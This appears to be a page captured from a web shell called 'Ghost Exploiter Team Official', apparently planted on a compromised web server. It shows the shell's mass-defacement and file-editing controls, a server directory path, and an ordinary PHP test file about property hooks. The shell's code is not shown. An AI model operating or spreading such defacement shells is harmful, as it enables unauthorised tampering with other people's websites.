Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
tests
/
integration
/
data
/
PHP84
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AsymmetricAccessor.php
0.092KB
edt
ren
AsymmetricPropertyPromo
...
0.146KB
edt
ren
PropertyHook.php
0.675KB
edt
ren
PropertyHookAsymmetric.php
0.51KB
edt
ren
PropertyHookPromotion.php
0.848KB
edt
ren
PropertyHookVirtual.php
1.556KB
edt
ren
<?php declare(strict_types=1); class PropertyHookVirtual { /** * A virtual property that composes a full name from first and last name */ public string $fullName { // This is a virtual property with a getter // It doesn't reference $this->fullName get { return $this->firstName . ' ' . $this->lastName; } } /** * A virtual property that decomposes a full name into first and last name */ public string $compositeName { // This is a virtual property with a setter // It doesn't reference $this->compositeName set(string $value) { [$this->firstName, $this->lastName] = explode(' ', $value, 2); } } /** * A virtual property with both getter and setter */ public string $completeFullName { // Getter doesn't reference $this->completeFullName get { return $this->firstName . ' ' . $this->lastName; } // Setter doesn't reference $this->completeFullName set(string $value) { [$this->firstName, $this->lastName] = explode(' ', $value, 2); } } /** * A non-virtual property that references itself in its hook */ public string $nonVirtualName { get { return $this->nonVirtualName ?? $this->firstName; } set(string $value) { $this->nonVirtualName = $value; } } public function __construct( private string $firstName = 'John', private string $lastName = 'Doe' ) { } }
<=Back
Liking